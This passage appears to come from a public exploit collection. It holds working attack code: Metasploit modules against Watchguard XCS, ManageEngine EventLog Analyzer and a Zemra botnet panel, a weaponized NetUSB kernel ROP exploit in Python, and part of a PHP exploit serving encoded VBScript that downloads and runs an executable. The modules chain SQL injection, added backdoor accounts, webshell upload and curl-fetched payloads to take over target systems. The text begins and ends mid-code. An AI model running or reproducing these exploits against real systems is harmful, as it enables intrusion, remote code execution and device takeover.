#{nick}\r\n" msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n" send_msg(sock,msg) end def join(sock) join_msg = "JOIN #{datastore['CHANNEL']}\r\n" send_msg(sock, join_msg) end def w3tw0rk_command(sock) encoded = payload.encoded command_msg = "PRIVMSG #{datastore['CHANNEL']} :!bot #{encoded}\r\n" send_msg(sock, command_msg) end def quit(sock) quit_msg = "QUIT :bye bye\r\n" sock.put(quit_msg) end def exploit connect print_status("#{rhost}:#{rport} - Registering with the IRC Server...") res = register(sock) if res =~ /463/ || res =~ /464/ print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed") return end print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...") res = join(sock) if !res =~ /353/ && !res =~ /366/ print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel") return end print_status("#{rhost}:#{rport} - Exploiting the IRC bot...") w3tw0rk_command(sock) quit(sock) disconnect end end
  6. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Watchguard XCS Remote Command Execution', 'Description' => %q{ This module exploits two separate vulnerabilities found in the Watchguard XCS virtual appliance to gain command execution. By exploiting an unauthenticated SQL injection, a remote attacker may insert a valid web user into the appliance database, and get access to the web interface. On the other hand, a vulnerability in the web interface allows the attacker to inject operating system commands as the 'nobody' user. }, 'Author' => [ 'Daniel Jensen <daniel.jensen[at]security-assessment.com>' # discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'http://security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf'] ], 'Platform' => 'bsd', 'Arch' => ARCH_X86_64, 'Privileged' => false, 'Stance' => Msf::Exploit::Stance::Aggressive, 'Targets' => [ [ 'Watchguard XCS 9.2/10.0', { }] ], 'DefaultOptions' => { 'SSL' => true }, 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 29 2015' )) register_options( [ OptString.new('TARGETURI', [true, 'The target URI', '/']), OptString.new('WATCHGUARD_USER', [true, 'Web interface user account to add', 'backdoor']), OptString.new('WATCHGUARD_PASSWORD', [true, 'Web interface user password', 'backdoor']), OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]), Opt::RPORT(443) ], self.class ) end def check #Check to see if the SQLi is present res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/borderpost/imp/compose.php3'), 'cookie' => "sid=1'" }) if res && res.body && res.body.include?('unterminated quoted string') return Exploit::CheckCode::Vulnerable end Exploit::CheckCode::Safe end def exploit # Get a valid session by logging in or exploiting SQLi to add user print_status('Getting a valid session...') @sid = get_session print_status('Successfully logged in') # Check if cmd injection works test_cmd_inj = send_cmd_exec('/ADMIN/mailqueue.spl', 'id') unless test_cmd_inj && test_cmd_inj.body.include?('uid=65534') fail_with(Failure::UnexpectedReply, 'Could not inject command, may not be vulnerable') end # We have cmd exec, stand up an HTTP server and deliver the payload vprint_status('Getting ready to drop binary on appliance') @elf_sent = false # Generate payload @pl = generate_payload_exe if @pl.nil? fail_with(Failure::BadConfig, 'Please select a native bsd payload') end # Start the server and use primer to trigger fetching and running of the payload begin Timeout.timeout(datastore['HTTPDELAY']) { super } rescue Timeout::Error end end def attempt_login(username, pwd_clear) #Attempts to login with the provided user credentials #Get the login page get_login_hash = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/login.spl') }) unless get_login_hash && get_login_hash.body fail_with(Failure::Unreachable, 'Could not get login page.') end #Find the hash token needed to login login_hash = '' get_login_hash.body.each_line do |line| next if line !~ /name="hash" value="(.*)"/ login_hash = $1 break end sid_cookie = (get_login_hash.get_cookies || '').scan(/sid=(\w+);/).flatten[0] || '' if login_hash == '' || sid_cookie == '' fail_with(Failure::UnexpectedReply, 'Could not find login hash or cookie') end login_post = { 'u' => "#{username}", 'pwd' => "#{pwd_clear}", 'hash' => login_hash, 'login' => 'Login' } print_status('Attempting to login with provided credentials') login = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/login.spl'), 'method' => 'POST', 'encode_params' => false, 'cookie' => "sid=#{sid_cookie}", 'vars_post' => login_post, 'vars_get' => { 'f' => 'V' } }) unless login && login.body && login.body.include?('<title>Loading...</title>') return nil end sid_cookie end def add_user(user_id, username, pwd_hash, pwd_clear) #Adds a user to the database using the unauthed SQLi res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/borderpost/imp/compose.php3'), 'cookie' => "sid=1%3BINSERT INTO sds_users (self, login, password, org, priv_level, quota, disk_usage) VALUES(#{user_id}, '#{username}', '#{pwd_hash}', 0, 'server_admin', 0, 0)--" }) unless res && res.body fail_with(Failure::Unreachable, "Could not connect to host") end if res.body.include?('ERROR: duplicate key value violates unique constraint') print_status("Added backdoor user, credentials => #{username}:#{pwd_clear}") else fail_with(Failure::UnexpectedReply, 'Unable to add user to database') end true end def generate_device_hash(cleartext_password) #Generates the specific hashes needed for the XCS pre_salt = 'BorderWare ' post_salt = ' some other random (9) stuff' hash_tmp = Rex::Text.md5(pre_salt + cleartext_password + post_salt) final_hash = Rex::Text.md5(cleartext_password + hash_tmp) final_hash end def send_cmd_exec(uri, os_cmd, blocking = true) #This is a handler function that makes HTTP calls to exploit the command injection issue unless @sid fail_with(Failure::Unknown, 'Missing a session cookie when attempting to execute command.') end opts = { 'uri' => normalize_uri(target_uri.path, "#{uri}"), 'cookie' => "sid=#{@sid}", 'encode_params' => true, 'vars_get' => { 'f' => 'dnld', 'id' => ";#{os_cmd}" } } if blocking res = send_request_cgi(opts) else res = send_request_cgi(opts, 1) end #Handle cmd exec failures if res.nil? && blocking fail_with(Failure::Unknown, 'Failed to exploit command injection.') end res end def get_session #Gets a valid login session, either valid creds or the SQLi vulnerability username = datastore['WATCHGUARD_USER'] pwd_clear = datastore['WATCHGUARD_PASSWORD'] user_id = rand(999) sid_cookie = attempt_login(username, pwd_clear) return sid_cookie unless sid_cookie.nil? vprint_error('Failed to login, attempting to add backdoor user...') pwd_hash = generate_device_hash(pwd_clear) unless add_user(user_id, username, pwd_hash, pwd_clear) fail_with(Failure::Unknown, 'Failed to add user account to database.') end sid_cookie = attempt_login(username, pwd_clear) unless sid_cookie fail_with(Failure::Unknown, 'Unable to login with user account.') end sid_cookie end # Make the server download the payload and run it def primer vprint_status('Primer hook called, make the server get and run exploit') #Gets the autogenerated uri from the mixin payload_uri = get_uri filename = rand_text_alpha_lower(8) print_status("Sending download request for #{payload_uri}") download_cmd = "/usr/local/sbin/curl -k #{payload_uri} -o /tmp/#{filename}" vprint_status("Telling appliance to run #{download_cmd}") send_cmd_exec('/ADMIN/mailqueue.spl', download_cmd) register_file_for_cleanup("/tmp/#{filename}") chmod_cmd = "chmod +x /tmp/#{filename}" vprint_status('Chmoding the payload...') send_cmd_exec("/ADMIN/mailqueue.spl", chmod_cmd) exec_cmd = "/tmp/#{filename}" vprint_status('Running the payload...') send_cmd_exec('/ADMIN/mailqueue.spl', exec_cmd, false) vprint_status('Finished primer hook, raising Timeout::Error manually') raise(Timeout::Error) end #Handle incoming requests from the server def on_request_uri(cli, request) vprint_status("on_request_uri called: #{request.inspect}") print_status('Sending the payload to the server...') @elf_sent = true send_response(cli, @pl) end end
  7. require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper include Msf::Exploit::Powershell def initialize(info={}) super(update_info(info, 'Name' => 'ManageEngine EventLog Analyzer Remote Code Execution', 'Description' => %q{ This module exploits a SQL query functionality in ManageEngine EventLog Analyzer v10.6 build 10060 and previous versions. Every authenticated user, including the default "guest" account can execute SQL queries directly on the underlying Postgres database server. The queries are executed as the "postgres" user which has full privileges and thus is able to write files to disk. This way a JSP payload can be uploaded and executed with SYSTEM privileges on the web server. This module has been tested successfully on ManageEngine EventLog Analyzer 10.0 (build 10003) over Windows 7 SP1. }, 'License' => MSF_LICENSE, 'Author' => [ 'xistence <xistence[at]0x90.nl>' # Discovery, Metasploit module ], 'References' => [ ['EDB', '38173'] ], 'Platform' => ['win'], 'Arch' => ARCH_X86, 'Targets' => [ ['ManageEngine EventLog Analyzer 10.0 (build 10003) / Windows 7 SP1', {}] ], 'Privileged' => true, 'DisclosureDate' => 'Jul 11 2015', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(8400), OptString.new('USERNAME', [ true, 'The username to authenticate as', 'guest' ]), OptString.new('PASSWORD', [ true, 'The password to authenticate as', 'guest' ]) ], self.class) end def uri target_uri.path end def check # Check version vprint_status("#{peer} - Trying to detect ManageEngine EventLog Analyzer") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'event', 'index3.do') }) if res && res.code == 200 && res.body && res.body.include?('ManageEngine EventLog Analyzer') return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end end def sql_query(cookies, query) res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'event', 'runQuery.do'), 'cookie' => cookies, 'vars_post' => { 'execute' => 'true', 'query' => query, } }) unless res && res.code == 200 fail_with(Failure::Unknown, "#{peer} - Failed executing SQL query!") end res end def generate_jsp_payload(cmd) decoder = rand_text_alpha(4 + rand(32 - 4)) decoded_bytes = rand_text_alpha(4 + rand(32 - 4)) cmd_array = rand_text_alpha(4 + rand(32 - 4)) jsp_code = '<%' jsp_code << "sun.misc.BASE64Decoder #{decoder} = new sun.misc.BASE64Decoder();\n" jsp_code << "byte[] #{decoded_bytes} = #{decoder}.decodeBuffer(\"#{Rex::Text.encode_base64(cmd)}\");\n" jsp_code << "String [] #{cmd_array} = new String[3];\n" jsp_code << "#{cmd_array}[0] = \"cmd.exe\";\n" jsp_code << "#{cmd_array}[1] = \"/c\";\n" jsp_code << "#{cmd_array}[2] = new String(#{decoded_bytes}, \"UTF-8\");\n" jsp_code << "Runtime.getRuntime().exec(#{cmd_array});\n" jsp_code << '%>' jsp_code end def exploit print_status("#{peer} - Retrieving JSESSION ID") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'event', 'index3.do'), }) if res && res.code == 200 && res.get_cookies =~ /JSESSIONID=(\w+);/ jsessionid = $1 print_status("#{peer} - JSESSION ID Retrieved [ #{jsessionid} ]") else fail_with(Failure::Unknown, "#{peer} - Unable to retrieve JSESSION ID!") end print_status("#{peer} - Access login page") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'event', "j_security_check;jsessionid=#{jsessionid}"), 'vars_post' => { 'forChecking' => 'null', 'j_username' => datastore['USERNAME'], 'j_password' => datastore['PASSWORD'], 'domains' => "Local Authentication\r\n", 'loginButton' => 'Login', 'optionValue' => 'hide' } }) if res && res.code == 302 redirect = URI(res.headers['Location']) print_status("#{peer} - Location is [ #{redirect} ]") else fail_with(Failure::Unknown, "#{peer} - Access to login page failed!") end # Follow redirection process print_status("#{peer} - Following redirection") res = send_request_cgi({ 'uri' => "#{redirect}", 'method' => 'GET' }) if res && res.code == 200 && res.get_cookies =~ /JSESSIONID/ cookies = res.get_cookies print_status("#{peer} - Logged in, new cookies retrieved [#{cookies}]") else fail_with(Failure::Unknown, "#{peer} - Redirect failed, unable to login with provided credentials!") end jsp_name = rand_text_alphanumeric(4 + rand(32 - 4)) + '.jsp' cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first) jsp_payload = Rex::Text.encode_base64(generate_jsp_payload(cmd)).gsub(/\n/, '') print_status("#{peer} - Executing SQL queries") # Remove large object in database, just in case it exists from previous exploit attempts sql = 'SELECT lo_unlink(-1)' result = sql_query(cookies, sql) # Create large object "-1". We use "-1" so we will not accidently overwrite large objects in use by other tasks. sql = 'SELECT lo_create(-1)' result = sql_query(cookies, sql) if result.body =~ /menuItemRow\">([0-9]+)/ loid = $1 else fail_with(Failure::Unknown, "#{peer} - Postgres Large Object ID not found!") end select_random = rand_text_numeric(2 + rand(6 - 2)) # Insert JSP payload into the pg_largeobject table. We have to use "SELECT" first to to bypass OpManager's checks for queries starting with INSERT/UPDATE/DELETE, etc. sql = "SELECT #{select_random};INSERT INTO/**/pg_largeobject/**/(loid,pageno,data)/**/VALUES(#{loid}, 0, DECODE('#{jsp_payload}', 'base64'));--" result = sql_query(cookies, sql) # Export our large object id data into a WAR file sql = "SELECT lo_export(#{loid}, '..//..//webapps//event/#{jsp_name}');" sql_query(cookies, sql) # Remove our large object in the database sql = 'SELECT lo_unlink(-1)' result = sql_query(cookies, sql) register_file_for_cleanup("..\\webapps\\event\\#{jsp_name}") print_status("#{peer} - Executing JSP payload") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, jsp_name), }) # If the server returns 200 we assume we uploaded and executed the payload file successfully unless res && res.code == 200 print_status("#{res.code}\n#{res.body}") fail_with(Failure::Unknown, "#{peer} - Payload not executed, aborting!") end end end
  8. require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => 'Zemra Botnet CnC Web Panel Remote Code Execution', 'Description' => %q{ This module exploits the CnC web panel of Zemra Botnet which contains a backdoor inside its leaked source code. Zemra is a crimeware bot that can be used to conduct DDoS attacks and is detected by Symantec as Backdoor.Zemra. }, 'License' => MSF_LICENSE, 'Author' => [ 'Jay Turla <@shipcod3>', #Metasploit Module 'Angel Injection', #Initial Discovery (PoC from Inj3ct0r Team) 'Darren Martyn <@info_dox>' #Initial Discovery ], 'References' => [ ['URL', 'http://0day.today/exploit/19259'], ['URL', 'http://insecurety.net/?p=144'], #leaked source code and backdoor intro ['URL', 'http://www.symantec.com/connect/blogs/ddos-attacks-zemra-bot'] ], 'Privileged' => false, 'Payload' => { 'Space' => 10000, 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd' } }, 'Platform' => %w{ unix win }, 'Arch' => ARCH_CMD, 'Targets' => [ ['zemra panel / Unix', { 'Platform' => 'unix' } ], ['zemra panel / Windows', { 'Platform' => 'win' } ] ], 'DisclosureDate' => 'Jun 28 2012', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI',[true, "The path of the backdoor inside Zemra Botnet CnC Web Panel", "/Zemra/Panel/Zemra/system/command.php"]), ],self.class) end def check txt = Rex::Text.rand_text_alpha(8) http_send_command(txt) if res && res.body =~ /cmd/ return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def http_send_command(cmd) uri = normalize_uri(target_uri.path.to_s) res = send_request_cgi({ 'method' => 'GET', 'uri' => uri, 'vars_get' => { 'cmd' => cmd } }) unless res && res.code == 200 fail_with(Failure::Unknown, 'Failed to execute the command.') end res end def exploit http_send_command(payload.encoded) end end
  9. #!/usr/bin/env python # Source: http://haxx.in/blasty-vs-netusb.py # # CVE-2015-3036 - NetUSB Remote Code Execution exploit (Linux/MIPS) # =========================================================================== # This is a weaponized exploit for the NetUSB kernel vulnerability # discovered by SEC Consult Vulnerability Lab. [1] # # I don't like lazy vendors, I've seen some DoS PoC's floating around # for this bug.. and it's been almost five(!) months. So lets kick it up # a notch with an actual proof of concept that yields code exec. # # So anyway.. a remotely exploitable kernel vulnerability, exciting eh. ;-) # # Smash stack, ROP, decode, stage, spawn userland process. woo! # # Currently this is weaponized for one target device (the one I own, I was # planning on porting OpenWRT but got sidetracked by the NetUSB stuff in # the default firmware image, oooops. ;-D). # # This python script is horrible, but its not about the glue, its about # the tech contained therein. Some things *may* be (intentionally?) botched.. # lets see if "the community" cares enough to develop this any further, # I need to move on with life. ;-D # # Shoutouts to all my boys & girls around the world, you know who you are! # # Peace, # -- blasty <peter@haxx.in> // 20151013 # # References: # [1] : https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt # /20150519-0_KCodes_NetUSB_Kernel_Stack_Buffer_Overflow_v10.txt # import os, sys, struct, socket, time from Crypto.Cipher import AES def u32(v): return struct.pack("<L", v) def banner(): print "" print "## NetUSB (CVE-2015-3036) remote code execution exploit" print "## by blasty <peter@haxx.in>" print "" def usage(prog): print "usage : %s <host> <port> <cmd>" % (prog) print "example : %s 127.0.0.1 20005 'wget connectback..." % (prog) print "" banner() if len(sys.argv) != 4: usage(sys.argv[0]) exit(0) cmd = sys.argv[3] # Here's one, give us more! (hint: /proc/kallsyms and objdump, bro) targets = [ { "name" : "WNDR3700v5 - Linux 2.6.36 (mips32-le)", "kernel_base" : 0x80001000, # adjust to offset used in 'load_addr_and_jump' gadget # should be some big immediate to avoid NUL bytes "load_addr_offset" : 4156, "gadgets" : { # 8c42103c lw v0,4156(v0) # 0040f809 jalr v0 # 00000000 nop 'load_addr_and_jump' : 0x1f548, # 8fa20010 lw v0,16(sp) # 8fbf001c lw ra,28(sp) # 03e00008 jr ra # 27bd0020 addiu sp,sp,32 'load_v0_and_ra' : 0x34bbc, # 27b10010 addiu s1,sp,16 # 00602021 move a0,v1 # 0040f809 jalr v0 # 02202821 move a1,s1 'move_sp_plus16_to_s1' : 0x63570, # 0220f809 jalr s1 # 00000000 nop 'jalr_s1' : 0x63570, 'a_r4k_blast_dcache' : 0x6d4678, 'kmalloc' : 0xb110c, 'ks_recv' : 0xc145e270, 'call_usermodehelper_setup' : 0x5b91c, 'call_usermodehelper_exec' : 0x5bb20 } } ] # im lazy, hardcoded to use the only avail. target for now # hey, at least I made it somewhat easy to easily add new targets target = targets[0] # hullo there. hello = "\x56\x03" # sekrit keyz that are hardcoded in netusb.ko, sorry KCodes # people, this is not how you implement auth. lol. aesk0 = "0B7928FF6A76223C21A3B794084E1CAD".decode('hex') aesk1 = "A2353556541CFE44EC468248064DE66C".decode('hex') key = aesk1 IV = "\x00"*16 mode = AES.MODE_CBC aes = AES.new(key, mode, IV=IV) aesk0_d = aes.decrypt(aesk0) aes2 = AES.new(aesk0_d, mode, IV="\x00"*16) s = socket.create_connection((sys.argv[1], int(sys.argv[2], 0))) print "[>] sending HELLO pkt" s.send(hello) time.sleep(0.2) verify_data = "\xaa"*16 print "[>] sending verify data" s.send(verify_data) time.sleep(0.2) print "[>] reading response" data = s.recv(0x200) print "[!] got %d bytes .." % len(data) print "[>] data: " + data.encode('hex') pkt = aes2.decrypt(data) print "[>] decr: " + pkt.encode("hex") if pkt[0:16] != "\xaa"*16: print "[!] error: decrypted rnd data mismatch :(" exit(-1) rnd = data[16:] aes2 = AES.new(aesk0_d, mode, IV="\x00"*16) pkt_c = aes2.encrypt(rnd) print "[>] sending back crypted random data" s.send(pkt_c) # Once upon a time.. d = "A" # hardcoded decoder_key, this one is 'safe' for the current stager decoder_key = 0x1337babf # NUL-free mips code which decodes the next stage, # flushes the d-cache, and branches there. # loosely inspired by some shit Julien Tinnes once wrote. decoder_stub = [ 0x0320e821, # move sp,t9 0x27a90168, # addiu t1,sp,360 0x2529fef0, # addiu t1,t1,-272 0x240afffb, # li t2,-5 0x01405027, # nor t2,t2,zero 0x214bfffc, # addi t3,t2,-4 0x240cff87, # li t4,-121 0x01806027, # nor t4,t4,zero 0x3c0d0000, # [8] lui t5, xorkey@hi 0x35ad0000, # [9] ori t5,t5, xorkey@lo 0x8d28fffc, # lw t0,-4(t1) 0x010d7026, # xor t6,t0,t5 0xad2efffc, # sw t6,-4(t1) 0x258cfffc, # addiu t4,t4,-4 0x140cfffb, # bne zero,t4,0x28 0x012a4820, # add t1,t1,t2 0x3c190000, # [16] lui t9, (a_r4k_blast_dcache-0x110)@hi 0x37390000, # [17] ori t9,t9,(a_r4k_blast_dcache-0x110)@lo 0x8f390110, # lw t9,272(t9) 0x0320f809, # jalr t9 0x3c181234, # lui t8,0x1234 ] # patch xorkey into decoder stub decoder_stub[8] = decoder_stub[8] | (decoder_key >> 16) decoder_stub[9] = decoder_stub[9] | (decoder_key & 0xffff) r4k_blast_dcache = target['kernel_base'] r4k_blast_dcache = r4k_blast_dcache + target['gadgets']['a_r4k_blast_dcache'] # patch the r4k_blast_dcache address in decoder stub decoder_stub[16] = decoder_stub[16] | (r4k_blast_dcache >> 16) decoder_stub[17] = decoder_stub[17] | (r4k_blast_dcache & 0xffff) # pad it out d += "A"*(233-len(d)) # kernel payload stager kernel_stager = [ 0x27bdffe0, # addiu sp,sp,-32 0x24041000, # li a0,4096 0x24050000, # li a1,0 0x3c190000, # [3] lui t9,kmalloc@hi 0x37390000, # [4] ori t9,t9,kmalloc@lo 0x0320f809, # jalr t9 0x00000000, # nop 0x0040b821, # move s7,v0 0x02602021, # move a0,s3 0x02e02821, # move a1,s7 0x24061000, # li a2,4096 0x00003821, # move a3,zero 0x3c190000, # [12] lui t9,ks_recv@hi 0x37390000, # [13] ori t9,t9,ks_recv@lo 0x0320f809, # jalr t9 0x00000000, # nop 0x3c190000, # [16] lui t9,a_r4k_blast_dcache@hi 0x37390000, # [17] ori t9,t9,a_r4k_blast_dcache@lo 0x8f390000, # lw t9,0(t9) 0x0320f809, # jalr t9 0x00000000, # nop 0x02e0f809, # jalr s7 0x00000000 # nop ] kmalloc = target['kernel_base'] + target['gadgets']['kmalloc'] ks_recv = target['gadgets']['ks_recv'] # patch kernel stager kernel_stager[3] = kernel_stager[3] | (kmalloc >> 16) kernel_stager[4] = kernel_stager[4] | (kmalloc & 0xffff) kernel_stager[12] = kernel_stager[12] | (ks_recv >> 16) kernel_stager[13] = kernel_stager[13] | (ks_recv & 0xffff) kernel_stager[16] = kernel_stager[16] | (r4k_blast_dcache >> 16) kernel_stager[17] = kernel_stager[17] | (r4k_blast_dcache & 0xffff) # a ROP chain for MIPS, always ew. rop = [ # this gadget will # v0 = *(sp+16) # ra = *(sp+28) # sp += 32 target['kernel_base'] + target['gadgets']['load_v0_and_ra'], # stack for the g_load_v0_and_ra gadget 0xaaaaaaa1, # sp+0 0xaaaaaaa2, # sp+4 0xaaaaaaa3, # sp+8 0xaaaaaaa4, # sp+12 r4k_blast_dcache - target['load_addr_offset'], # sp+16 / v0 0xaaaaaaa6, # sp+20 0xaaaaaaa7, # sp+24 # this gadget will # v0 = *(v0 + 4156) # v0(); # ra = *(sp + 20) # sp += 24 # ra(); target['kernel_base'] + target['gadgets']['load_addr_and_jump'], # sp+28 0xbbbbbbb2, 0xccccccc3, 0xddddddd4, 0xeeeeeee5, 0xeeeeeee6, # this is the RA fetched by g_load_addr_and_jump target['kernel_base'] + target['gadgets']['load_v0_and_ra'], # stack for the g_load_v0_and_ra gadget 0xaaaaaaa1, # sp+0 0xaaaaaaa2, # sp+4 0xaaaaaaa3, # sp+8 0xaaaaaaa4, # sp+12 target['kernel_base'] + target['gadgets']['jalr_s1'], # sp+16 / v0 0xaaaaaaa6, # sp+20 0xaaaaaaa7, # sp+24 target['kernel_base'] + target['gadgets']['move_sp_plus16_to_s1'], # ra # second piece of native code getting executed, pivot back in the stack 0x27b9febc, # t9 = sp - offset 0x0320f809, # jalr t9 0x3c181234, # nop 0x3c181234, # nop # first native code getting executed, branch back to previous 4 opcodes 0x03a0c821, # move t9, sp 0x0320f809, # jalr t9 0x3c181234, ] # append rop chain to buffer for w in rop: d += u32(w) # append decoder_stub to buffer for w in decoder_stub: d += u32(w) # encode stager and append to buffer for w in kernel_stager: d += u32(w ^ decoder_key) print "[>] sending computername_length.." time.sleep(0.1) s.send(struct.pack("<L", len(d))) print "[>] sending payload.." time.sleep(0.1) s.send(d) time.sleep(0.1) print "[>] sending stage2.." # a useful thing to do when you bust straight into the kernel # is to go back to userland, huhuhu. # thanks to jix for the usermodehelper suggestion! :) kernel_shellcode = [ 0x3c16dead, # lui s6,0xdead 0x3c19dead, # lui t9,0xdead 0x3739c0de, # ori t9,t9,0xc0de 0x2404007c, # li a0, argv 0x00972021, # addu a0,a0,s7 0x2405008c, # li a1, argv0 0x00b72821, # addu a1,a1,s7 0xac850000, # sw a1,0(a0) 0x24050094, # li a1, argv1 0x00b72821, # addu a1,a1,s7 0xac850004, # sw a1,4(a0) 0x24060097, # li a2, argv2 0x00d73021, # addu a2,a2,s7 0xac860008, # sw a2,8(a0) 0x00802821, # move a1,a0 0x2404008c, # li a0, argv0 0x00972021, # addu a0,a0,s7 0x24060078, # li a2, envp 0x00d73021, # addu a2,a2,s7 0x24070020, # li a3,32 0x3c190000, # [20] lui t9,call_usermodehelper_setup@hi 0x37390000, # [21] ori t9,t9,call_usermodehelper_setup@lo # call_usermodehelper_setup(argv[0], argv, envp, GPF_ATOMIC) 0x0320f809, # jalr t9 0x00000000, # nop 0x00402021, # move a0,v0 0x24050002, # li a1,2 0x3c190000, # [26] lui t9,call_usermodehelper_exec@hi 0x37390000, # [27] ori t9,t9,call_usermodehelper_exec@lo # call_usermodehelper_exec(retval, UHM_WAIT_PROC) 0x0320f809, # jalr t9 0x00000000, # nop # envp ptr 0x00000000, # argv ptrs 0x00000000, 0x00000000, 0x00000000, 0x00000000 ] usermodehelper_setup = target['gadgets']['call_usermodehelper_setup'] usermodehelper_exec = target['gadgets']['call_usermodehelper_exec'] # patch call_usermodehelper_setup into kernel shellcode kernel_shellcode[20] = kernel_shellcode[20] | (usermodehelper_setup>>16) kernel_shellcode[21] = kernel_shellcode[21] | (usermodehelper_setup&0xffff) # patch call_usermodehelper_setup into kernel shellcode kernel_shellcode[26] = kernel_shellcode[26] | (usermodehelper_exec>>16) kernel_shellcode[27] = kernel_shellcode[27] | (usermodehelper_exec&0xffff) payload = "" for w in kernel_shellcode: payload += u32(w) payload += "/bin/sh\x00" payload += "-c\x00" payload += cmd # and now for the moneyshot s.send(payload) print "[~] KABOOM! Have a nice day."
  10. #!/usr/bin/php <?php ########################################################## # Title : HTML Compiler Remote Code Execution # HTML Compiler is a program that allows you to put an entire HTML application into a standalone Windows application. # Author : Ehsan Noreddini # E-Mail : me@ehsann.info # Social : @prot3ct0r # Special Thanks : Mohammad Reza Espargham ;) ########################################################## # CVE : CVE2014-6332 # Tested on : Windows7 # Download : http://html-compiler.en.softonic.com/ # Website : http://htmlcompiler.com/ ########################################################## # 1 . run php code : php exploit.php # 2 . open "HTML Compiler" # 3 . File -> New Project -> Choose here your site index file # 4 . browse loader.html # 5 . Enjoy ! ########################################################## # loader.html source code : # # <html><head><title>poc</title><META http-equiv="refresh" content="0;URL=[Your IP Address]"></head></html> ########################################################## # proof : http://ehsann.info/proof/HTML_Compiler_Remote_Code_Execute.png ########################################################## $port=80; # Listen port ( if using from Skype or another program that using from 80 port change this ) $link="http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe"; # Your Malicious file $socket = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!'); socket_bind($socket, 0,$port); socket_listen($socket); print "http://ipaddress:$port / http://127.0.0.1:$port\n\n"; $msg = "\x3c\x68\x74\x6d\x6c\x3e\x0d\x0a\x3c\x6d\x65\x74\x61\x20\x68\x74\x74\x70\x2d\x65\x71\x75\x69\x76". "\x3d\x22\x58\x2d\x55\x41\x2d\x43\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x22\x20\x63\x6f\x6e\x74\x65". "\x6e\x74\x3d\x22\x49\x45\x3d\x45\x6d\x75\x6c\x61\x74\x65\x49\x45\x38\x22\x20\x3e\x0d\x0a\x3c\x68". "\x65\x61\x64\x3e\x0d\x0a\x3c\x2f\x68\x65\x61\x64\x3e\x0d\x0a\x3c\x62\x6f\x64\x79\x3e\x0d\x0a\x20". "\x0d\x0a\x3c\x53\x43\x52\x49\x50\x54\x20\x4c\x41\x4e\x47\x55\x41\x47\x45\x3d\x22\x56\x42\x53\x63". "\x72\x69\x70\x74\x22\x3e\x0d\x0a\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x72\x75\x6e\x6d\x75". "\x6d\x61\x61\x28\x29\x20\x0d\x0a\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20". "\x4e\x65\x78\x74\x0d\x0a\x73\x65\x74\x20\x73\x68\x65\x6c\x6c\x3d\x63\x72\x65\x61\x74\x65\x6f\x62". "\x6a\x65\x63\x74\x28\x22\x53\x68\x65\x6c\x6c\x2e\x41\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x22". "\x29\x0d\x0a\x63\x6f\x6d\x6d\x61\x6e\x64\x3d\x22\x49\x6e\x76\x6f\x6b\x65\x2d\x45\x78\x70\x72\x65". "\x73\x73\x69\x6f\x6e\x20\x24\x28\x4e\x65\x77\x2d\x4f\x62\x6a\x65\x63\x74\x20\x53\x79\x73\x74\x65". "\x6d\x2e\x4e\x65\x74\x2e\x57\x65\x62\x43\x6c\x69\x65\x6e\x74\x29\x2e\x44\x6f\x77\x6e\x6c\x6f\x61". "\x64\x46\x69\x6c\x65\x28\x27\x46\x49\x4c\x45\x5f\x44\x4f\x57\x4e\x4c\x4f\x41\x44\x27\x2c\x27\x6c". "\x6f\x61\x64\x2e\x65\x78\x65\x27\x29\x3b\x24\x28\x4e\x65\x77\x2d\x4f\x62\x6a\x65\x63\x74\x20\x2d". "\x63\x6f\x6d\x20\x53\x68\x65\x6c\x6c\x2e\x41\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x29\x2e\x53". "\x68\x65\x6c\x6c\x45\x78\x65\x63\x75\x74\x65\x28\x27\x6c\x6f\x61\x64\x2e\x65\x78\x65\x27\x29\x3b". "\x22\x0d\x0a\x73\x68\x65\x6c\x6c\x2e\x53\x68\x65\x6c\x6c\x45\x78\x65\x63\x75\x74\x65\x20\x22\x70". 